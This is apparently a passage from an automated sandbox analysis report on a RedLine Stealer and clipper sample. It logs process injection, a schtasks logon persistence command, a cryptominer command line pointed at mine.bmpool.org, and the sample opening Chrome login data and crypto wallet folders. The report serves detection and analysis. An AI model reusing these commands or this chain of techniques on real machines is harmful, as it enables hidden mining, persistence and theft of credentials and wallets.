                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1B0F37B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 201F1F70000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 224D5930000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25F9A6F0000 protect: page execute and read and write
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
                  Creates a thread in another existing process (thread injection)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeThread created: C:\Windows\System32\conhost.exe EIP: F37B0000
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: F1F70000
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: D5930000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeThread created: C:\Windows\System32\conhost.exe EIP: 9A6F0000
                  Writes to foreign memory regionsShow sources
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: D3B008
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: F18008
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeMemory written: C:\Windows\System32\conhost.exe base: 1B0F37B0000
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 201F1F70000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 2E2010
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 224D5930000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 10FF010
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 25F9A6F0000
                  Injects code into the Windows Explorer (explorer.exe)Show sources
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140000000 value: 4D
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140001000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140367000 value: 1E
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 1404A0000 value: F0
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140753000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140775000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140776000 value: C5
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140777000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140779000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077B000 value: 60
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077C000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077D000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 2E2010 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140000000 value: 4D
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140001000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140367000 value: 1E
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 1404A0000 value: F0
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140753000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140775000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140776000 value: C5
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140777000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140779000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077B000 value: 60
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077C000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077D000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 10FF010 value: 00
                  Modifies the context of a thread in another process (thread injection)Show sources
                  Source: C:\Windows\System32\conhost.exeThread register set: target process: 6924
                  Source: C:\Windows\System32\conhost.exeThread register set: target process: 4876
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Program Manager
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\explorer.exeCode function: 27_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected RedLine StealerShow sources
                  Source: Yara matchFile source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Yara detected Redline ClipperShow sources
                  Source: Yara matchFile source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.sistem.exe.be970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.sistem.exe.2910000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sistem.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7016, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Tries to steal Crypto Currency WalletsShow sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: Yara matchFile source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR

                  Remote Access Functionality:

                  barindex
                  Yara detected RedLine StealerShow sources
                  Source: Yara matchFile source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation221Windows Service1Windows Service1Disable or Modify Tools11OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsCommand and Scripting Interpreter12Scheduled Task/Job1Process Injection712Obfuscated Files or Information2Input Capture1File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Software Packing2Security Account ManagerSystem Information Discovery124SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery421Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion331LSA SecretsProcess Discovery12SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection712Cached Domain CredentialsVirtualization/Sandbox Evasion331VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
